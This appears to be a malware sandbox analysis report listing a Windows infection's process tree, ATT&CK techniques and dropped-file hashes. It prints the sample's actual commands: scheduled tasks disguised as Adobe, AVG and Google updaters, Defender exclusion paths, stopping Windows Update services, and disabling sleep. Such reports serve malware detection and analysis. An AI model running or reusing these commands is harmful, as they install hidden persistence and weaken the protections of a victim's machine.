C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tqzeetif#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'AdobeChkUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Microsoft\MMC\Adobe\Driver\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\MMC\Adobe\Driver\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'AdobeChkUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
1⤵
PID:2864
- C:\Windows\SysWOW64\autoconv.exe
  "C:\Windows\SysWOW64\autoconv.exe"
  2⤵
  PID:200
- C:\Windows\SysWOW64\NETSTAT.EXE
  "C:\Windows\SysWOW64\NETSTAT.EXE"
  2⤵
  - Gathers network information
  PID:5484
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:5668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4476

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:3860

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "MicrosoftUpdateTaskMachineCQ"
1⤵
PID:5984

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a\VCheck.exe"
1⤵
PID:4468
- C:\Windows\System32\choice.exe
  choice /C Y /N /D Y /T 3
  2⤵
  PID:5896

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "MGUpdateTaskMachineQT"
1⤵
PID:2344

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "AdobeChkUpdateTaskMachineQC"
1⤵
PID:5308

C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\SysWOW64\cmstp.exe"
1⤵
PID:5504
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\fzfyx.exe"
  2⤵
  PID:5968
- C:\Windows\SysWOW64\autochk.exe
  "C:\Windows\SysWOW64\autochk.exe"
  2⤵
  PID:5884
- C:\Windows\SysWOW64\NETSTAT.EXE
  "C:\Windows\SysWOW64\NETSTAT.EXE"
  2⤵
  - Gathers network information
  PID:3416
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 280
    3⤵
    - Program crash
    PID:5824

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:5176
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6056
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6052
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5224
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:4744
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5992

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:5948
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6136
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4992
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5876
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:4984
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5480

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "AdobeUpdateTaskMachineQC"
1⤵
PID:5404

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /tn "AdobeUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\avmzwyqqcbjc.xml"
1⤵
- Creates scheduled task(s)
PID:4964

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "AVGUpdateTaskMachineQC"
1⤵
PID:3704

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "AdobeUpdateTaskMachineQC"
1⤵
PID:1376

C:\Users\Admin\AppData\Roaming\Microst\MMC\Adobe\updater.exe
C:\Users\Admin\AppData\Roaming\Microst\MMC\Adobe\updater.exe
1⤵
PID:5916

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /tn "AVGUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\rhlghesahbwt.xml"
1⤵
- Creates scheduled task(s)
PID:720

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "AVGUpdateTaskMachineQC"
1⤵
PID:4816

C:\Users\Admin\AppData\Roaming\Microsoft\MMC\AVG\updater.exe
C:\Users\Admin\AppData\Roaming\Microsoft\MMC\AVG\updater.exe
1⤵
PID:5308

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
1⤵
PID:3240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Recent\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:536

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:6584
- C:\Program Files\Bitcoin\bitcoin-qt.exe
  "C:\Program Files\Bitcoin\bitcoin-qt.exe"
  2⤵
  PID:6852

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:6620
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:7944
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:9840
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:14900
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:6988
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:7176

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:8336
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6696
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6796
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:7380
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:8824
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:9612

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
1⤵
PID:11248

C:\Users\Admin\AppData\Local\Temp\a\55aa5e.exe
C:\Users\Admin\AppData\Local\Temp\a\55aa5e.exe
1⤵
PID:14664

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\SysWOW64\wscript.exe"
1⤵
PID:14920
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\a\dollzx.exe"
  2⤵
  PID:4996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Default\Recent\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:448

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /tn "AdobeUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\avmzwyqqcbjc.xml"
1⤵
- Creates scheduled task(s)
PID:7340

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /tn "AVGUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\rhlghesahbwt.xml"
1⤵
- Creates scheduled task(s)
PID:8184

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:8708

C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
1⤵
PID:8752

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:9264

C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
1⤵
PID:9268

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
1⤵
PID:11792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Recent\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:16140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:10732

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
1⤵
PID:5924

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:8216

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:8456
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:14772
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:13692
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:16332
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:6172
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:7104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:11176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5608

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:13248

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
1⤵
PID:13396

C:\Users\Admin\AppData\Local\WindowsSecurity\RF6tg7YH.exe
C:\Users\Admin\AppData\Local\WindowsSecurity\RF6tg7YH.exe
1⤵
PID:13592

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:13232
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:16748
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:2152
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:16120
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:12712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:14056

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:15232
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6784
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:8628
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6148
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:14584
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:6124

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\kvwconemfbmr.xml"
1⤵
- Creates scheduled task(s)
PID:15500

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:15216
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3584
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:8556
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:11436
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:13756
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:1612

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:5152

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:14696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jybujx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:6296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:6244

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:6808
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:17080
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:6728
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:9312
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:7912

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5840
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:16508
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:8332
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:7040
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:11432

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
1⤵
PID:10120

C:\Users\Admin\AppData\Local\Temp\a\55aa5e.exe
C:\Users\Admin\AppData\Local\Temp\a\55aa5e.exe
1⤵
PID:9984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:9752

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
1⤵
PID:10068

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:8552

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:13132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\webRef\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8272

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:11580
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6752
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:9544
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:17004
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:13672
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:9888

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\kvwconemfbmr.xml"
1⤵
- Creates scheduled task(s)
PID:8648

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:8964
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:14760
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:2388
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:6796
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:13032

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:13860

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
1⤵
PID:340

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
1⤵
PID:5572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Electrum\electrum-4.3.4.exe

Filesize
6.2MB

MD5
069734015e60da5fded622190f8e0ed3

SHA1
0acac093f89d7113ddb7f7aae3c6e02c7813d9e1

SHA256
23ed5a7bc5aaceb7c5778571f099dd452e3ee190e7153afa20b836fb949c9192

SHA512
1c4abd8153a23d5fe3465781e20721ba24a10c14a4c9c107dff215781c26548eb1817bc096a9a9aabc2d36eb0b8fdb133ca718c753468c271e0a9e78c080cedc

Download Submit
C:\Program Files (x86)\Electrum\electrum\plugins\payserver\www\vendor\jquery-ui-themes-1.12.1\themes\dark-hive\images\ui-icons_ffffff_256x240.png

Filesize
6KB

MD5
2e2a588883eebc04ad50854a6ecfbac1

SHA1
e457b4c6ef4c18513e3bb6f81e873592de31f0c5

SHA256
357f4d62c6f7ad56f7caa72029362379adb4a1a48f33f43f226b1284474fabdb

SHA512
edac3d55ee5491e6edde4c5db11371c47bf47f976de3aa493b78a5bcdf33992c4e28caf56288780fb96c35896448655305e8cd33e94082034951db3d7a032f34

Download Submit
C:\Program Files (x86)\Electrum\electrum\plugins\payserver\www\vendor\jquery-ui-themes-1.12.1\themes\redmond\images\ui-icons_2e83ff_256x240.png

Filesize
4KB

MD5
db3b908bd060c6f278fde9e11b3b94e3

SHA1
3f4a9c46377eecde2c1368ef2b963712b8df5c75

SHA256
ca8fb2eb9a086b0c170eb61317c91138ec06ea0fef878b8e24d1f50bf6af2a17

SHA512
9d27f0e66856343254b4c75969b47b3ebaccd95e63981f18472563d95cb85ae3a1a286187f25da0af0996e5c783b8807babc6c7c6698a180175b06c31a949488

Download Submit
C:\Program Files (x86)\Electrum\electrum\plugins\payserver\www\vendor\jquery-ui-themes-1.12.1\themes\smoothness\images\ui-icons_222222_256x240.png

Filesize
6KB

MD5
23aca9c182696db96ff9ee5bf9601461

SHA1
f2fb72129db2ba61e5e9e572b24d82fb93acc3f4

SHA256
28d8b65fd4815ebffb752beb60b976d22e8bd4004194b8cfdd0e9a14e39814bd

SHA512
f36fe89779d9eedd2456826125166428824abd33c999b187f69f976f51a5fae7a2b286b44c4312b7b920bdbe0f043ebb652723962267489eb0b575eb5179fec0

Download Submit
C:\Program Files (x86)\Electrum\electrum\plugins\payserver\www\vendor\jquery-ui-themes-1.12.1\themes\smoothness\images\ui-icons_454545_256x240.png

Filesize
6KB

MD5
5c3ba680cc34cd9b30855c180474a152

SHA1
91ffcf4a399238c121f42951ba801e7c5030c1da

SHA256
33eeda3a7aceac3e727fca686f18e8736824ed4a1fce72b8952f01eb2356cd77

SHA512
4fd4b8000f8059c5ca9484a3b61ea10c1323110336d924983d3473f489a4fe7e417db2af4e02433bfe017831e6b80cc427c00531eacc55bfe6d2501cd2686269

Download Submit
C:\Program Files (x86)\Electrum\electrum\plugins\payserver\www\vendor\jquery-ui-themes-1.12.1\themes\trontastic\images\ui-icons_cd0a0a_256x240.png

Filesize
4KB

MD5
a6a39c47239fcdbbe6e1d5bfaa7adac3

SHA1
e01c6ed29c81ad21b84d0b96427976474d77f21c

SHA256
90044cc699ba3148b8f8777cf7ba69cdb63187582370ae49e3412e00056e05cb

SHA512
48f691b2480f302b2064417feef9e28adb28367ff2caa549f351dd014f63a75d70aed68b546851371bec822d7cb037cc644c6aac1d5c2bc3b6c94e07f00cb87d

Download Submit
C:\Program Files (x86)\Electrum\electrum\plugins\payserver\www\vendor\jquery-ui-themes-1.12.1\themes\ui-darkness\images\ui-icons_cccccc_256x240.png

Filesize
6KB

MD5
883030509884c748b039641f5955e85c

SHA1
fa1bcf0d7310168cf3dd77a30cb527a31eeb6d5c

SHA256
055799e2f20c94bb0cd60d6afb71d362daa66aae390032ab03c631c92fec1860

SHA512
830c390394294c460d177fb4fc0d714d05994eac8feb5ad98c42876f204c8fe51983c31536c84b3dd6d8dc172e24555ba06e64efb0bac60cb3c5c4bfb7235814

Download Submit
C:\Program Files\Bitcoin\bitcoin-qt.exe

Filesize
30.9MB

MD5
192e9704618653ff8d63eb98ae206060

SHA1
767f0afc33cac9b9e3966fdb559ea2eab7776642

SHA256
3fdb9c1f6a360c4b1dae2053fb0b3ccb5d6fc25749797faceb6b0573ef47677b

SHA512
32963e6b00caf5b7331dddebbd8fb7eea950c98faff692c561911373d5934161eea2ac32a113cb236db2d908945db4962db4a29624dfc172db33be9d08a40000

Download Submit
C:\ProgramData\ContentDWSvc\ContentDWSvc.exe

Filesize
1.7MB

MD5
3add66b24f2098b66e31e3786e70ece6

SHA1
6df84ffe6719e86b5c4da80e7e23a8d2148d2a07

SHA256
413bd4deea1c54771ea1a158d9726b561527e4d17a4e36b7de9d24e610332791

SHA512
6071944f348186fe17f7090507d53897058e0aebbae6c17a6b98a8c4fea8d2b44b69dc790ad193a3009eaff2ba75a754fc337bb59c162f0bd0fb904edd0d48c6

Download Submit
C:\ProgramData\presepuesto\LEAJ.exe

Filesize
5.7MB

MD5
a5c6dcf7ef6eac4c0157b5e2f0155424

SHA1
248ad0e9f6f403d172a54abaeaf92df074d617fe

SHA256
6707dfab5d78cad62a28c59519e5809092c5b3d817d39c15a472f0363e88a5fa

SHA512
0e12dc417988ac0358ea7807c4ba1b9894d2679607734b883be5db3cea0e45a537524ac625ab941a377b686f80e92a6623f6bcd06459c848ca04720cc3f7b24c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\605c6065631cc4be6d5f5a8e4e650ddc

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GoogleUpdate.exe.log

Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Setup1234.exe.log

Filesize
425B

MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
